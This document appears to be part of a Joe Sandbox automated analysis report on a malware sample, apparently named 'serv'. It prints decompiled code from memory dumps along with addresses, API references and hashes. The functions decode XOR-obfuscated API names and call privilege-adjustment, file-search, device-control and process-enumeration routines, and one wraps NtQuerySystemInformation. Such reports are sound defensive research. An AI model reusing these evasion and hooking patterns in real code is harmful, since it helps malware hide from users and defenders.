                                                                    					_a35 = 0x16;
                                                                    					_a36 = 0x52;
                                                                    					_a37 = 0x1d;
                                                                    					_a38 = 0x16;
                                                                    					_a39 = 0x11;
                                                                    					_a40 = 0x50;
                                                                    					_a41 = 0xf;
                                                                    					_a42 = 0xd;
                                                                    					_a43 = 0x51;
                                                                    					_a45 = 0x18;
                                                                    					_a46 = 0x16;
                                                                    					_a47 = 0x7f;
                                                                    					_t257 = 0;
                                                                    				}
                                                                    				goto L6;
                                                                    			}


























                                                                    0x00414313
                                                                    0x0041431b
                                                                    0x00414325
                                                                    0x00414329
                                                                    0x0041432d
                                                                    0x00414333
                                                                    0x00414337
                                                                    0x0041433f
                                                                    0x00414343
                                                                    0x00414349
                                                                    0x0041434d
                                                                    0x00414351
                                                                    0x00414356
                                                                    0x0041435a
                                                                    0x00414371
                                                                    0x00414373
                                                                    0x00414378
                                                                    0x0041437c
                                                                    0x00414381
                                                                    0x00414386
                                                                    0x0041438b
                                                                    0x00414390
                                                                    0x00414395
                                                                    0x0041439a
                                                                    0x0041439f
                                                                    0x004143a4
                                                                    0x004143a9
                                                                    0x004143ae
                                                                    0x004143b2
                                                                    0x004143b7
                                                                    0x004143bc
                                                                    0x004143bc
                                                                    0x00414440
                                                                    0x00414440
                                                                    0x00414443
                                                                    0x0041444a
                                                                    0x00414445
                                                                    0x00414445
                                                                    0x00414445
                                                                    0x0041444d
                                                                    0x00414452
                                                                    0x00414453
                                                                    0x00414458
                                                                    0x0041445e
                                                                    0x00414468
                                                                    0x00414460
                                                                    0x00414462
                                                                    0x00414462
                                                                    0x0041446a
                                                                    0x0041447c
                                                                    0x0041447c
                                                                    0x0041447e
                                                                    0x00414487
                                                                    0x0041448a
                                                                    0x0041448f
                                                                    0x00414494
                                                                    0x004144a0
                                                                    0x004144a0
                                                                    0x004144a2
                                                                    0x004144a2
                                                                    0x004144a5
                                                                    0x004144a9
                                                                    0x004144b2
                                                                    0x004144bc
                                                                    0x004144b4
                                                                    0x004144b4
                                                                    0x004144b4
                                                                    0x004144bf
                                                                    0x004144c2
                                                                    0x004144c7
                                                                    0x004144cb
                                                                    0x00414991
                                                                    0x00414999
                                                                    0x004149b6
                                                                    0x004149c4
                                                                    0x0041499b
                                                                    0x0041499e
                                                                    0x004149ae
                                                                    0x004149ae
                                                                    0x004144d1
                                                                    0x004144d1
                                                                    0x00000000
                                                                    0x004144da
                                                                    0x004144de
                                                                    0x004144e4
                                                                    0x004144e8
                                                                    0x004144ec
                                                                    0x00414503
                                                                    0x00414507
                                                                    0x0041450c
                                                                    0x00414511
                                                                    0x00414516
                                                                    0x0041451b
                                                                    0x00414520
                                                                    0x00414525
                                                                    0x0041452a
                                                                    0x0041452f
                                                                    0x00414534
                                                                    0x0041453c
                                                                    0x00414544
                                                                    0x0041454c
                                                                    0x00414554
                                                                    0x0041455c
                                                                    0x00414564
                                                                    0x0041456c
                                                                    0x0041458d
                                                                    0x004145a8
                                                                    0x004145ad
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004145b6
                                                                    0x004145bb
                                                                    0x004145bf
                                                                    0x004145c4
                                                                    0x004145c9
                                                                    0x004145ce
                                                                    0x004145d3
                                                                    0x004145d8
                                                                    0x004145dd
                                                                    0x004145e2
                                                                    0x004145e7
                                                                    0x004145ec
                                                                    0x004145f2
                                                                    0x004145fa
                                                                    0x00414600
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041460a
                                                                    0x00414611
                                                                    0x00414615
                                                                    0x0041461a
                                                                    0x0041461e
                                                                    0x00414623
                                                                    0x00414628
                                                                    0x0041462d
                                                                    0x00414632
                                                                    0x00414636
                                                                    0x0041463b
                                                                    0x00414640
                                                                    0x00414645
                                                                    0x00414649
                                                                    0x0041464e
                                                                    0x00414653
                                                                    0x00414657
                                                                    0x0041465c
                                                                    0x00414669
                                                                    0x0041466f
                                                                    0x00414673
                                                                    0x00414678
                                                                    0x00414685
                                                                    0x0041467a
                                                                    0x0041467c
                                                                    0x0041467c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004146fb
                                                                    0x004146fd
                                                                    0x00414701
                                                                    0x00414705
                                                                    0x0041470d
                                                                    0x00414712
                                                                    0x00414716
                                                                    0x0041471b
                                                                    0x00414720
                                                                    0x00414725
                                                                    0x0041472a
                                                                    0x0041472f
                                                                    0x00414734
                                                                    0x00414739
                                                                    0x0041473e
                                                                    0x00414743
                                                                    0x00414747
                                                                    0x0041474b
                                                                    0x00414750
                                                                    0x00414755
                                                                    0x00414759
                                                                    0x0041475d
                                                                    0x00414762
                                                                    0x00414767
                                                                    0x00414778
                                                                    0x0041477e
                                                                    0x00414782
                                                                    0x00414785
                                                                    0x00414787
                                                                    0x00414787
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041468c
                                                                    0x0041468e
                                                                    0x00414692
                                                                    0x00414698
                                                                    0x0041469d
                                                                    0x004146a1
                                                                    0x004146a6
                                                                    0x004146ab
                                                                    0x004146b0
                                                                    0x004146b5
                                                                    0x004146ba
                                                                    0x004146bf
                                                                    0x004146c3
                                                                    0x004146c8
                                                                    0x004146cd
                                                                    0x004146d1
                                                                    0x004146d6
                                                                    0x004146db
                                                                    0x004146e0
                                                                    0x004146ed
                                                                    0x004146f3
                                                                    0x0041478b
                                                                    0x0041478b
                                                                    0x00414791
                                                                    0x0041479b
                                                                    0x00414793
                                                                    0x00414795
                                                                    0x00414795
                                                                    0x0041479d
                                                                    0x0041479e
                                                                    0x004147a2
                                                                    0x004147b4
                                                                    0x004147b9
                                                                    0x004147d0
                                                                    0x004147d2
                                                                    0x004147d8
                                                                    0x004147df
                                                                    0x004147da
                                                                    0x004147da
                                                                    0x004147da
                                                                    0x004147e7
                                                                    0x004147eb
                                                                    0x004147f5
                                                                    0x004147f5
                                                                    0x004147f9
                                                                    0x00414801
                                                                    0x00414805
                                                                    0x00414809
                                                                    0x0041480d
                                                                    0x00414811
                                                                    0x00414815
                                                                    0x00414819
                                                                    0x0041481d
                                                                    0x00414832
                                                                    0x00414834
                                                                    0x00414839
                                                                    0x0041483e
                                                                    0x00414843
                                                                    0x00414848
                                                                    0x0041484d
                                                                    0x00414852
                                                                    0x00414857
                                                                    0x0041485c
                                                                    0x00414861
                                                                    0x00414866
                                                                    0x0041486b
                                                                    0x00414870
                                                                    0x00414875
                                                                    0x0041487a
                                                                    0x0041487f
                                                                    0x00414881
                                                                    0x00414884
                                                                    0x0041488b
                                                                    0x00414886
                                                                    0x00414886
                                                                    0x00414886
                                                                    0x0041488e
                                                                    0x00414893
                                                                    0x00414894
                                                                    0x004148a7
                                                                    0x004148b0
                                                                    0x004148bd
                                                                    0x004148c5
                                                                    0x004148cd
                                                                    0x004148e5
                                                                    0x004148ea
                                                                    0x004148f3
                                                                    0x00414900
                                                                    0x00414905
                                                                    0x0041490b
                                                                    0x0041491a
                                                                    0x0041491e
                                                                    0x00414920
                                                                    0x00414926
                                                                    0x00414927
                                                                    0x0041492f
                                                                    0x00414932
                                                                    0x0041493a
                                                                    0x00414945
                                                                    0x00414947
                                                                    0x0041494f
                                                                    0x00414956
                                                                    0x00414951
                                                                    0x00414951
                                                                    0x00414951
                                                                    0x0041495d
                                                                    0x0041495e
                                                                    0x0041495f
                                                                    0x00414970
                                                                    0x00414975
                                                                    0x00414981
                                                                    0x00414981
                                                                    0x0041498e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004144d1
                                                                    0x00000000
                                                                    0x004143c0
                                                                    0x004143c3
                                                                    0x004143ca
                                                                    0x004143c5
                                                                    0x004143c5
                                                                    0x004143c5
                                                                    0x004143cd
                                                                    0x004143d2
                                                                    0x004143d6
                                                                    0x00000000
                                                                    0x004143d8
                                                                    0x004143da
                                                                    0x004143de
                                                                    0x004143f1
                                                                    0x004143f3
                                                                    0x004143f8
                                                                    0x004143fd
                                                                    0x00414402
                                                                    0x00414407
                                                                    0x0041440c
                                                                    0x00414411
                                                                    0x00414416
                                                                    0x0041441b
                                                                    0x00414420
                                                                    0x00414425
                                                                    0x0041442a
                                                                    0x0041442f
                                                                    0x00414434
                                                                    0x00414439
                                                                    0x00414439
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !$"$"$%$($.$0$4$7$<$P$P$Q$Q$Q$R$c$w$w
                                                                    • API String ID: 0-2260797450
                                                                    • Opcode ID: 70b7c7062832431428cb35c09ecc746385695e1338527874924484ae4bd2f882
                                                                    • Instruction ID: 7a979fc8e47214274b4b9a001fe33a5b77939df83124664241806668bc464c82
                                                                    • Opcode Fuzzy Hash: 70b7c7062832431428cb35c09ecc746385695e1338527874924484ae4bd2f882
                                                                    • Instruction Fuzzy Hash: 93126E7110C3C28AD322CA7C888469FBFD45BE7314F584A9EF1E58B3D2C6658649C7A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 99 41b4f0-41b4fa 100 41b500-41b57c 99->100 101 41b59b-41b5aa CreateToolhelp32Snapshot 99->101 102 41b580-41b588 100->102 102->102 103 41b58a-41b596 call 41a600 102->103 103->101
                                                                    C-Code - Quality: 100%
                                                                    			E0041B4F0(int _a4, int _a8) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				char _v24;
                                                                    				char _v25;
                                                                    				char _v26;
                                                                    				char _v27;
                                                                    				void* _t30;
                                                                    				void* _t32;
                                                                    				char* _t40;
                                                                    
                                                                    				if( *0x447e64 == 0) {
                                                                    					_v26 = 0x77;
                                                                    					_v23 = 0x77;
                                                                    					_v17 = 0x77;
                                                                    					_v21 = 0x7d;
                                                                    					_v20 = 0x7d;
                                                                    					_v6 = 0x7d;
                                                                    					 *_t40 = 0x51;
                                                                    					_v27 = 0x60;
                                                                    					_v25 = 0x73;
                                                                    					_v24 = 0x66;
                                                                    					_v22 = 0x46;
                                                                    					_v19 = 0x7e;
                                                                    					_v18 = 0x7a;
                                                                    					_v16 = 0x7e;
                                                                    					_v15 = 0x62;
                                                                    					_v14 = 0x21;
                                                                    					_v13 = 0x20;
                                                                    					_v12 = 0x41;
                                                                    					_v11 = 0x7c;
                                                                    					_v10 = 0x73;
                                                                    					_v9 = 0x62;
                                                                    					_v8 = 0x61;
                                                                    					_v7 = 0x7a;
                                                                    					_v5 = 0x66;
                                                                    					_v4 = 0x12;
                                                                    					_t32 = 0;
                                                                    					do {
                                                                    						 *(_t40 + _t32) =  *(_t40 + _t32) ^ 0x00000012;
                                                                    						_t32 = _t32 + 1;
                                                                    					} while (_t32 < 0x19);
                                                                    					 *0x447e64 = E0041A600(_t40);
                                                                    				}
                                                                    				_t30 = CreateToolhelp32Snapshot(_a4, _a8); // executed
                                                                    				return _t30;
                                                                    			}






























                                                                    0x0041b4fa
                                                                    0x0041b504
                                                                    0x0041b508
                                                                    0x0041b50e
                                                                    0x0041b514
                                                                    0x0041b518
                                                                    0x0041b51c
                                                                    0x0041b520
                                                                    0x0041b524
                                                                    0x0041b529
                                                                    0x0041b52e
                                                                    0x0041b533
                                                                    0x0041b538
                                                                    0x0041b53d
                                                                    0x0041b541
                                                                    0x0041b546
                                                                    0x0041b54a
                                                                    0x0041b54f
                                                                    0x0041b554
                                                                    0x0041b559
                                                                    0x0041b55e
                                                                    0x0041b563
                                                                    0x0041b567
                                                                    0x0041b56c
                                                                    0x0041b570
                                                                    0x0041b575
                                                                    0x0041b57a
                                                                    0x0041b580
                                                                    0x0041b580
                                                                    0x0041b584
                                                                    0x0041b585
                                                                    0x0041b596
                                                                    0x0041b596
                                                                    0x0041b5a5
                                                                    0x0041b5aa

                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,0040549D,00000002,00000000,?,00000000,?,00000104,00000000,00000530), ref: 0041B5A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CreateSnapshotToolhelp32
                                                                    • String ID: $!$A$F$`$a$f$f$s$s$|$~$~
                                                                    • API String ID: 3332741929-276757098
                                                                    • Opcode ID: 56a397b542cb39bf9d17c3569c6b67cfbdd63e8c03db4e3c6bf112e5dbf62438
                                                                    • Instruction ID: dc67cecbc751b5e8b5d2ba98ce0fc40da5fa0561fbac3f53796e6855ab7c809f
                                                                    • Opcode Fuzzy Hash: 56a397b542cb39bf9d17c3569c6b67cfbdd63e8c03db4e3c6bf112e5dbf62438
                                                                    • Instruction Fuzzy Hash: 0921D32140D3C1AAE302DB68954878BBFD15BB6248F18CC8CE0D84B253D2BAC65CD7B7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041BF10(CHAR* _a4, struct _WIN32_FIND_DATAA* _a8) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				void* _t20;
                                                                    				void* _t22;
                                                                    				char* _t28;
                                                                    
                                                                    				if( *0x447eac == 0) {
                                                                    					_v15 = 0x7f;
                                                                    					_v11 = 0x7f;
                                                                    					_v6 = 0x7f;
                                                                    					 *_t28 = 0x50;
                                                                    					_v14 = 0x78;
                                                                    					_v13 = 0x72;
                                                                    					_v12 = 0x50;
                                                                    					_v10 = 0x64;
                                                                    					_v9 = 0x65;
                                                                    					_v8 = 0x62;
                                                                    					_v7 = 0x50;
                                                                    					_v5 = 0x7a;
                                                                    					_v4 = 0x73;
                                                                    					_v3 = 0x57;
                                                                    					_v2 = 0x16;
                                                                    					_t22 = 0;
                                                                    					do {
                                                                    						 *(_t28 + _t22) =  *(_t28 + _t22) ^ 0x00000016;
                                                                    						_t22 = _t22 + 1;
                                                                    					} while (_t22 < 0xf);
                                                                    					 *0x447eac = E0041A600(_t28);
                                                                    				}
                                                                    				_t20 = FindFirstFileA(_a4, _a8); // executed
                                                                    				return _t20;
                                                                    			}




















                                                                    0x0041bf1a
                                                                    0x0041bf20
                                                                    0x0041bf24
                                                                    0x0041bf28
                                                                    0x0041bf2c
                                                                    0x0041bf2f
                                                                    0x0041bf34
                                                                    0x0041bf39
                                                                    0x0041bf3d
                                                                    0x0041bf42
                                                                    0x0041bf47
                                                                    0x0041bf4c
                                                                    0x0041bf50
                                                                    0x0041bf55
                                                                    0x0041bf5a
                                                                    0x0041bf5f
                                                                    0x0041bf64
                                                                    0x0041bf66
                                                                    0x0041bf66
                                                                    0x0041bf6a
                                                                    0x0041bf6b
                                                                    0x0041bf7c
                                                                    0x0041bf7c
                                                                    0x0041bf8b
                                                                    0x0041bf90

                                                                    APIs
                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,?,BBBBBCF2), ref: 0041BF8B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID: W$b$d$e$r$s$x$z
                                                                    • API String ID: 1974802433-3277462257
                                                                    • Opcode ID: b38707d79f61b2a80762de4aef598488e9feca099d18a6ec9baf5e0530c3b2f9
                                                                    • Instruction ID: f7f6ead944a3733796883be5f1b0d5bfd9fec7c1fb46b606fcb9a3c64278a875
                                                                    • Opcode Fuzzy Hash: b38707d79f61b2a80762de4aef598488e9feca099d18a6ec9baf5e0530c3b2f9
                                                                    • Instruction Fuzzy Hash: 3E011B6140C3C0ADE302D778984868BBFD15BB2244F08CC9DE0D887253D2B99559D773
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041CB80(void* _a4, int _a8, struct _TOKEN_PRIVILEGES* _a12, long _a16, struct _TOKEN_PRIVILEGES* _a20, DWORD* _a24) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				int _t31;
                                                                    				void* _t33;
                                                                    				CHAR* _t44;
                                                                    
                                                                    				if( *0x447f28 == 0) {
                                                                    					_v15 = 0xe2;
                                                                    					_v7 = 0xe2;
                                                                    					_v5 = 0xe2;
                                                                    					 *_t44 = 0xc6;
                                                                    					_v23 = 0xe3;
                                                                    					_v22 = 0xed;
                                                                    					_v21 = 0xf2;
                                                                    					_v20 = 0xf4;
                                                                    					_v19 = 0xf3;
                                                                    					_v18 = 0xd3;
                                                                    					_v17 = 0xe8;
                                                                    					_v16 = 0xec;
                                                                    					_v14 = 0xe9;
                                                                    					_v13 = 0xd7;
                                                                    					_v12 = 0xf5;
                                                                    					_v11 = 0xee;
                                                                    					_v10 = 0xf1;
                                                                    					_v9 = 0xee;
                                                                    					_v8 = 0xeb;
                                                                    					_v6 = 0xe0;
                                                                    					_v4 = 0xf4;
                                                                    					_v3 = 0x87;
                                                                    					_t33 = 0;
                                                                    					do {
                                                                    						 *(_t44 + _t33) =  *(_t44 + _t33) ^ 0x00000087;
                                                                    						_t33 = _t33 + 1;
                                                                    					} while (_t33 < 0x16);
                                                                    					 *0x447f28 = E0041C580(_t44);
                                                                    				}
                                                                    				_t31 = AdjustTokenPrivileges(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                                    				return _t31;
                                                                    			}



























                                                                    0x0041cb8a
                                                                    0x0041cb96
                                                                    0x0041cb9a
                                                                    0x0041cb9e
                                                                    0x0041cba2
                                                                    0x0041cba6
                                                                    0x0041cbab
                                                                    0x0041cbb0
                                                                    0x0041cbb5
                                                                    0x0041cbb9
                                                                    0x0041cbbe
                                                                    0x0041cbc3
                                                                    0x0041cbc8
                                                                    0x0041cbcd
                                                                    0x0041cbd2
                                                                    0x0041cbd7
                                                                    0x0041cbdc
                                                                    0x0041cbe0
                                                                    0x0041cbe5
                                                                    0x0041cbe9
                                                                    0x0041cbee
                                                                    0x0041cbf3
                                                                    0x0041cbf7
                                                                    0x0041cbfc
                                                                    0x0041cc00
                                                                    0x0041cc00
                                                                    0x0041cc04
                                                                    0x0041cc05
                                                                    0x0041cc16
                                                                    0x0041cc16
                                                                    0x0041cc39
                                                                    0x0041cc3e

                                                                    APIs
                                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,00000028,00000000), ref: 0041CC39
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 2874748243-0
                                                                    • Opcode ID: 8db03c02f419c84f7b6486d44207498d345ac1c2ca0590340ee6d8dc473ad3fa
                                                                    • Instruction ID: f503069ee82d848e4d78f65c6278731523a08229b22530ea11afb5313c1fa475
                                                                    • Opcode Fuzzy Hash: 8db03c02f419c84f7b6486d44207498d345ac1c2ca0590340ee6d8dc473ad3fa
                                                                    • Instruction Fuzzy Hash: 1621B56100C7C2AE8222DA7C488484FBFD559E7134F58CB8CF0F9872E2D220C50AC7A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041C400(void* _a4, long _a8, void* _a12, long _a16, void* _a20, long _a24, DWORD* _a28, struct _OVERLAPPED* _a32) {
                                                                    				char _v1;
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				int _t27;
                                                                    				void* _t30;
                                                                    				CHAR* _t41;
                                                                    
                                                                    				if( *0x447ed0 == 0) {
                                                                    					_v15 = 0x97;
                                                                    					_v11 = 0x97;
                                                                    					_v9 = 0x9d;
                                                                    					_v7 = 0x9d;
                                                                    					_v3 = 0x9d;
                                                                    					 *_t41 = 0xb6;
                                                                    					_v14 = 0x84;
                                                                    					_v13 = 0x9b;
                                                                    					_v12 = 0x91;
                                                                    					_v10 = 0xbb;
                                                                    					_v8 = 0xb1;
                                                                    					_v6 = 0x9c;
                                                                    					_v5 = 0x86;
                                                                    					_v4 = 0x80;
                                                                    					_v2 = 0x9e;
                                                                    					_v1 = 0xf2;
                                                                    					_t30 = 0;
                                                                    					do {
                                                                    						 *(_t41 + _t30) =  *(_t41 + _t30) ^ 0x000000f2;
                                                                    						_t30 = _t30 + 1;
                                                                    					} while (_t30 < 0x10);
                                                                    					 *0x447ed0 = E0041A600(_t41);
                                                                    				}
                                                                    				_t27 = DeviceIoControl(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32); // executed
                                                                    				return _t27;
                                                                    			}





















                                                                    0x0041c40a
                                                                    0x0041c40e
                                                                    0x0041c412
                                                                    0x0041c418
                                                                    0x0041c41c
                                                                    0x0041c420
                                                                    0x0041c424
                                                                    0x0041c428
                                                                    0x0041c42d
                                                                    0x0041c432
                                                                    0x0041c437
                                                                    0x0041c43c
                                                                    0x0041c441
                                                                    0x0041c446
                                                                    0x0041c44b
                                                                    0x0041c450
                                                                    0x0041c455
                                                                    0x0041c45a
                                                                    0x0041c460
                                                                    0x0041c460
                                                                    0x0041c464
                                                                    0x0041c465
                                                                    0x0041c476
                                                                    0x0041c476
                                                                    0x0041c4a3
                                                                    0x0041c4a8

                                                                    APIs
                                                                    • DeviceIoControl.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00000003,00000000,000000FF,00000200,?,?,00000000), ref: 0041C4A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: ControlDevice
                                                                    • String ID:
                                                                    • API String ID: 2352790924-0
                                                                    • Opcode ID: c4c7c89cab331c5b361efd56b646ccd38a3605245746a7d1ce98c486993f408c
                                                                    • Instruction ID: 0641709532ed32fb3172934f5dbb08c65b5ed4642bd79f4b03a70a339cb829b7
                                                                    • Opcode Fuzzy Hash: c4c7c89cab331c5b361efd56b646ccd38a3605245746a7d1ce98c486993f408c
                                                                    • Instruction Fuzzy Hash: F111E26111C782AEC311DB7C888485BBBE55AAA224F48CF8DF1F8872E6D230D502C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0056184A(union _SYSTEMINFOCLASS _a4, void* _a8, long _a12, long* _a16) {
                                                                    				char _v8;
                                                                    				void* __ecx;
                                                                    				signed int _t11;
                                                                    				long _t12;
                                                                    				long _t21;
                                                                    
                                                                    				E0056151A( &_v8,  *0x563224,  *0x563230);
                                                                    				_t11 = E00561CB5( *0x563234);
                                                                    				if(_t11 == 0) {
                                                                    					_t12 = NtQuerySystemInformation(_a4, _a8, _a12, _a16); // executed
                                                                    					_t21 = _t12;
                                                                    					if(_t21 == 0 && _a4 == 5) {
                                                                    						E00561647(_a8, _a12); // executed
                                                                    					}
                                                                    					return _t21;
                                                                    				}
                                                                    				return _t11 | 0xffffffff;
                                                                    			}








                                                                    0x0056185f
                                                                    0x0056186a
                                                                    0x00561871
                                                                    0x00561885
                                                                    0x0056188b
                                                                    0x0056188f
                                                                    0x0056189d
                                                                    0x005618a3
                                                                    0x00000000
                                                                    0x005618a6
                                                                    0x00000000

                                                                    APIs
                                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 00561885
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614225956.0000000000561000.00000020.00000001.01000000.00000008.sdmp, Offset: 00560000, based on PE: true
                                                                    • Associated: 00000002.00000002.614209974.0000000000560000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614242281.0000000000563000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614256717.0000000000564000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
